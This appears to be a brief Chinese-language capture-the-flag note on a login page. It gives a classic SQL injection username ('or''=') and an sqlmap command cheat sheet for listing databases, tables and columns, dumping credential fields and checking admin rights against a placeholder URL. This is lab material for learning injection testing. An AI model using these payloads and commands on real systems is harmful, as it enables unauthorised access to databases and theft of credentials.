welcome to loading bay control system. please input username to retrieve key
御剑试一下
跑出来用户名’or’‘=’
列出所有数据库:sqlmap -u “http://xxx” --dbs
列出当前数据库:sqlmap -u “http://xxx” --current-db
(2)读取表
sqlmap -u “http://xxx” -D 库名 --tables
(3)读取数据表中的字段名
sqlmap -u “http://xxx” -D 库名 -T 表名 --columns
(4)读取某字段的内容
sqlmap -u “http://xxx” -D 库名 -T 表名 -C 字段名(如:usename,passeord)–dump
(5)读取用户
列除所有管理用户:sqlmap -u “http://xxx” --users
当前用户:sqlmap -u “http://xxx” --current-user
判断是否为管理员用户:sqlmap -u “http://xxx” --is-dba